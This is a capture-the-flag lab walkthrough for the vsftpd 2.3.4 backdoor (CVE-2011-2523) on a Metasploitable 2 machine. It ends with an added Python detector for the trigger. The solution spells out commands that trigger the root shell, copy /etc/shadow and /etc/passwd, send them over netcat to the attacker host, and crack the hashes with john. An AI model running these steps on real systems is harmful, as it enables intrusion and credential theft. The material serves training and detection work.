# Scenario Capture the Flag - CVE-2011-2523
Capture the `/etc/shadow` and `/etc/passwd` files from the vulnerable Metasploitable 2 server and recover the passwords from the shadow hashes.
# Setup Environment
## Step 1: Download and unzip the virtual machines
For this CTF, we run VMware Workstation Pro with two virtual machines. We utilize Kali Linux as the attacker's machine and Metasploitable 2 as the vulnerable machine.
- Download and Install VMware Workstation: https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html
- Download and Extract Kali Linux Virtual Machine: https://www.kali.org/get-kali/
- Download and Extract Metasploitable 2 Virtual Machine: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
## Step 2: Open the Kali Linux and Metasploitable 2 virtual machines in VMware from the extracted files
- Choose the `Open a Virtual Machine` option in VMware Workstation and select the unzipped Kali Linux file
- Right-click in the sidebar, select the `Open` option, then select the unzipped Metasploitable 2 file
- Press the `Play virtual machine` button on both virtual machines
- When prompted to choose between `I moved it` and `I copied it`, select `I copied it`
## Step 3: Login
- Log in to Kali Linux using `kali` as both the username and the password
- Log in to Metasploitable using `msfadmin` as both the username and the password
## Step 4: Record the IP address of the Metasploitable virtual machine
- Run `ip addr show` and record the IP address shown in the `inet` field
# Solution
The CVE entry (maintained by MITRE) describes CVE-2011-2523 as: `vsftpd 2.3.4 downloaded between 20110630 and 20110703 contains a backdoor which opens a shell on port 6200/tcp`.
## Step 1: Scan the Metasploitable machine for open ports and find the FTP service
- `nmap <vulnerable-machine-ip-address>`
- The scan should show port 21/tcp open, running the FTP service
## Step 2: Connect to the open FTP port with netcat
- `nc <vulnerable-machine-ip-address> 21`
- The username is any string with `:)` appended to the end; enter `user <string>:)`
- When prompted for a password, enter any string: `pass <string>`
- Then close the connection with ^C (CTRL + C); a root shell on Metasploitable has now been opened on port 6200
## Step 3: Connect to the shell on port 6200 of the vulnerable machine
- `nc -v <vulnerable-machine-ip-address> 6200`
- Show the IP address of the machine you are now connected to with `ip addr show`
- Confirm that the shell runs as root with `whoami`
## Step 4: Copy the `/etc/shadow` and `/etc/passwd` files into separate files
- `cp /etc/shadow shadow.txt`
- `cp /etc/passwd passwd.txt`
## Step 5: Send the copied files to the Kali Linux machine using netcat
- On the attacker machine, look up its IP address in the `inet` field using `ip addr show`
- Listen for the incoming file on the attacker machine with `nc -l -p 1234 > shadow.txt`
- In the root shell on Metasploitable, send it with `nc -w 3 <destination-ip> 1234 < shadow.txt`
- Repeat for the passwd file
## Step 6: Convert the shadow file into the format used by the `John` tool
- `unshadow passwd.txt shadow.txt > unshadowed-input`
- Inspect the file with `cat unshadowed-input`; each line should contain a username and its password hash
## Step 7: Crack the shadow hashes with the `john` command and a wordlist
- Use the `rockyou.txt` wordlist to crack the hashes with john
- Unzip the wordlist on Kali Linux using `sudo gzip -d /usr/share/wordlists/rockyou.txt.gz`
- When prompted for a password, use the default Kali Linux password `kali`
- Crack the hashes with `john unshadowed-input --wordlist=/usr/share/wordlists/rockyou.txt`
- View the cracked passwords with `john --show unshadowed-input`
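A detection-side companion to the steps above, added here and not part of the original walkthrough: it scans FTP control-channel lines (a constructed sample is embedded) for the `vsFTPd 2.3.4` greeting banner and for `USER` commands carrying the `:)` trigger, which is what a network sensor or log review would look for to spot this backdoor being triggered. The log format and function names are assumptions for the example.

```python
import re

# Constructed sample of FTP control-channel commands, as a defender might export
# them from a packet capture or proxy log (not taken from the page).
SAMPLE_FTP_LOG = """\
220 (vsFTPd 2.3.4)
USER anonymous
PASS guest@example.com
230 Login successful.
USER letmein:)
PASS whatever
USER bob
PASS hunter2
"""

USER_CMD = re.compile(r"^USER\s+(.*)$", re.IGNORECASE)
AFFECTED_BANNER = re.compile(r"vsFTPd 2\.3\.4", re.IGNORECASE)
TRIGGER = ":)"  # the smiley sequence the walkthrough appends to the username


def find_backdoor_triggers(log_text):
    """Return (line_number, username) for every USER command whose argument
    contains ':)'. The walkthrough places it at the end of the name; matching
    it anywhere in the argument also covers that case."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        m = USER_CMD.match(line.strip())
        if m and TRIGGER in m.group(1):
            hits.append((n, m.group(1)))
    return hits


def banner_is_affected_version(log_text):
    """True if the server greeting advertises vsFTPd 2.3.4, the version named in
    the CVE description. The banner alone does not prove the build is the
    trojaned one, so treat a hit as a prompt to verify the installed package."""
    return any(AFFECTED_BANNER.search(line) for line in log_text.splitlines())


def triage(log_text):
    """Combine both checks into a list of findings suitable for an alert."""
    findings = []
    if banner_is_affected_version(log_text):
        findings.append("server banner advertises vsFTPd 2.3.4")
    for n, user in find_backdoor_triggers(log_text):
        findings.append(f"line {n}: USER argument {user!r} contains ':)' backdoor trigger")
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_FTP_LOG):
        print(finding)
```

A listening 6200/tcp on the FTP host is the other indicator the CVE text names, and the same `nmap` scan used in Step 1 will show it.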